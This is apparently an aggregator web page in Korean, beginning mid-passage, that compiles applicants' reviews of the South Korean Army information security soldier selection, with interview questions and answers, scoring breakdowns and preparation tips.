하는 존재라고 생각합니다. 그리고 외람된 대답이지만, 사회에서 어떤 생각을 가지고 있든 군인이 된다면 북한을 주적으로 판단해야한다고 생각합니다.

– 두번째 방에서 받은 질문

질문 답변 정보보호병에 대해 알아보셨을 때 가장 힘든점이 무엇이고 이를 어떻게 극복할 수 있을거라고 생각하시나요? 제가 정보보호병에 대해 알게 된 경로는 바로 선배님들을 통해서 입니다. 정보보호연합 커뮤니티에서 임원을 할 때 그리고 대학교에서 정보보안동아리를 할 때 선배님들이 말씀해주신 힘든점은 바로 교대근무였습니다. 대게 3교대를 진행하는데, 이는 24시간을 3명이서 교대근무를 하게 되면 밤과 낮이 바뀐다는 것입니다. 다행이도 백앤드 개발자 및 서버 관리자를 경험하면서 밤에 배포를 하고 서버를 구축하는 일을 많이 했기 때문에 충분히 교대 근무를 수행할 수 있습니다. 정보보호와 사이버보안의 차이점을 설명하실 수 있나요? 정보보호은 원래 있던 정보를 외부의 침입으로 부터 보호하는 것이라고 생각합니다. 관제등의 수행을 통해 정보의 접근을 막는 것이고, 사이버보안은 해킹 즉 시스템 공격으로 부터 대비하고 대처하는 것이라고 알고있습니다. 호스트와 서버가 있을 때 클라이언트 측에서 일어날 보안 공격에는 무엇이 있고 어떻게 대처해야할까요? 제가 웹 개발을 하면서 가장 신경썼던 보안 공격이 바로 인젝션 공격이었습니다. SQL 인젝션, Js 인젝션, XSS와 같은 공격이 가장 위험하다고 생각합니다. 쉽게 수행할 수 있기 때문입니다. 저는 이런 공격을 관련된 명령어와 코드가 삽입 되었을 때 데이터베이스에 저장하지 않고 뱉어내도록 코드를 작성하였고, DDos같은 공격을 예방하기 위해 Nginx를 사용해 프록시 서버를 사용해여 예방하였습니다. 최근 보안 동향에 대해 알고 계신가요? 보안경향도 결국 트랜드라고 생각합니다. 유행하는 서비스에 이용자가 많아지면 자연스럽게 이용자가 많은 서비스를 노리는 보안공격이 많이질 수 밖에 없다고 생각합니다. 제가 구독하는 IT 정보 채널에서는 클라우드와 메타버스에 관한 보안에 대한 기사가 많아졌습니다. log4j 보안 이슈를 알고 계시나요? log4j는 라이브러리 이름으로 Java혹은 다른 언어에서 사용할 수 있는 로그 자동 생성 라이브러리로 알고 있습니다. 이 라이브러리에 대해서만 알고있고 자세한 취약점은 모릅니다.

3. 결어

나의 단점은 코딩테스트 그리고 그럴싸한 상용화 경험이 없다는 것이다. 군대 내에서 알고리즘을 하고싶어 비교적 자유롭게 PC를 사용할 수 있는 보직에 지원하였고 다행이 합격하였다. 혹시 나와 같이 정보보호병을 준비하는 분들에게 도움이 되면 좋겠어서 글을 작성했다. 군 생활에 대한 글도 올렸으면 좋겠다.

반응형

육군 정보보호병 최종합격 후기

1차 39점 8순위

네트워크관리사2급 – 16점

고교출석 -1? – 9점

관련학과 2학년 재학 14점

꽤나 높은 점수를 받았다.

내 기억으로는 30점이 이번 커트라인이고 선발순위는 50위다.

다른 정보보호병 관련글들을 보면 인원상관없이 대충 30 언저리에서 자르는것같다.

(대부분 자격증이 없는 경우가 이런점수 일듯)

평군적으로 계산을 해보니 (2021년 마지막 선발, 2022년 1차 기준)

자격증 아마 높은 자격증은 거의 없을테니 대략 16점

고교출석 만점 기준 10점

관련학과 자체가 많이 없으니 컴공 2학년 재학 기준으로 10점

더해서 36점 정도가 평균일 것이라고 예상했었고 어느정도는 맞는것같다.

2차 26.5점 14순위

평균에서 3점차.. 공부해야했었다..

그래서 정말..정말.. 그동안 나왔던 복원 문제들만 보고 갔는데..

솔직히 처음보는 말도 나왔다.

솔직히 떨어진줄 알았다…

오.. 그래도 내가 문제를 어느정도 맞췄나보다.

면접은 점수를 거의 깍지않는다고 가정하고 문제는 소수점 점수가 없으니 18.5+8 이게 맞는듯하다.

10문제중 4문제라.. 그런데 선발 순위가 6순위 떨어졌다.

애초에 1차때 내앞에 있던 사람들은 경력이거나 BOB출신일테니 7명을 제외하면,

겨우 6명이 나보다 많이 맞은거라고 예측이 될것같다.

2차 모든 평가 부분에서 0점이 나오면 과락이긴한데 내가 예상한 평균이랑 최종이 20점차이면

그냥 다같이 시험을 못본거같다…ㅋㅋㅋㅋㅋㅋㅋㅋㅋ

아래는 합격배점내역과 먼저가는 전우?로서의 팁

1차

무조건 자격증 따야합니다.

네트워크관리사2급 그거 안어려워요.

관련학과이긴하지만 그거 3일보고 필기는 기억안나고 실기 94점으로 합격했어요.

그래야만 관련학과 애들이랑 점수 차이를 최대한 줄일 수 있어요.

그리고 본인이 고등학교때 일주일정도 빠졌으면 솔직히 지원’만’ 가능하십니다. 합격은 안되요.

2차

필기문제가 기억은 안나지만..

문제 예측하지말고 그냥 정보보안기사, 정보보호개론 정도 보고 가세요.

솔직히 면접관도 2주만에 이걸 전부 외울꺼라 생각하고 문제는 안낼껍니다.

일찍가세요.전 10시쯤에 도착해서 2번쨰로 갔는데 번호표오류?가 있어서 4번째로 면접봤습니다.

(늦게간만큼 대기시간이 길어져요.)

면접은 인성을 평가하는거랑 너가 뭘알고 있는가 이렇게 두번의 면접을보고 둘다 각4~5분입니다.

인성은 대인관계 처리방법 명령 처리방법을 물어보셨던걸로 기억하고, 뭘알고 있는지는 다른글들 처럼 IPS, IDS, 방화벽 이거 3개 차단범위, 장점, 단점 이렇게 무조건 외우고 거의 무조건 물어보는것 같아요.

그리고 빅테이터를 처리하는 방법 이렇게 두개를 물어보셨습니다.

물론 아직 입대도 안했지만 꼭 다음기수로 같은 자대에서 만나길 바랄께요. 화이팅!

궁금한점이 있으면 댓글남겨주시면 최대한 빨리 답드릴께요.

So you have finished reading the 정보 보호 병 후기 topic article, if you find this article useful, please share it. Thank you very much. See more: 정보보호병 하는일, 정보보호병 자대배치, 정보보호병 경쟁률, 정보보호병 디시, 공군 정보보호병, 해군 정보보호병 후기, 공군 정보보호병 후기, 정보보호 병 지원동기

Top 18 정보 보호 병 후기 Quick Answer

육군 정보보호병 후기

육군 정보보호병 합격 후기 #필기시험 #면접 #총평

[육군 정보보호병] 1차, 2차 후기 – (최종 합격!)

육군 정보보호병 최종합격 후기

BLOG

육군 정보보호병 지원 후기 – 면접 문항 및 질문 정리 (2021.01.28)

육군 정보보호병 후기 – IT 특기병 : 네이버 블로그

육군 정보보호병 면접 후기

육군 정보보호병 후기

[육군 정보보호병] 1차, 2차 후기 – (최종 합격!)

육군 정보보호병 최종합격 후기

Leave a Comment Cancel reply